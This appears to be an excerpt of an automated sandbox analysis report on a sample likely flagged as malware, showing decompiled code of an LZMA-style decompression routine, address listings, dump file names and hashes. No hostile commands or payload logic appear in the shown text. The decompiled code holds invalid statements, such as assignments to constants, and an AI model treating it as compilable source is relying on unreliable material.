													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00407395
0x00407395
0x00407399
0x004073be
0x004073c8
0x00000000
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a8
0x004073ac
0x004073ac
0x004073af
0x00407489
0x00407489
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00000000
0x00407482
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x00000000
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075e5
0x004075eb
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00407524
0x00000000
0x00407399

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
